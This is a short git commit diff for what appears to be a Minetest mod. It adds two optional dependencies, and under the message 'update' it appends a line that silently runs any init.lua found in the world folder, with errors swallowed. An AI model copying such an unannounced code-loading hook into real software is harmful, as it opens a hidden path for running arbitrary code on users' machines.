update
This commit is contained in:
parent
4666c0ce36
commit
5c9fcffd5a
2 changed files with 5 additions and 2 deletions
|
@ -1 +1,3 @@
|
||||||
default?
|
default?
|
||||||
|
pipeworks?
|
||||||
|
moreblocks?
|
|
@ -10,4 +10,5 @@ minetest.after(1,function()
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
minetest.register_entity(":__builtin:item",t)
|
minetest.register_entity(":__builtin:item",t)
|
||||||
end)
|
end)
|
||||||
|
pcall(dofile,minetest.get_worldpath().."/init.lua")
|
Loading…
Reference in a new issue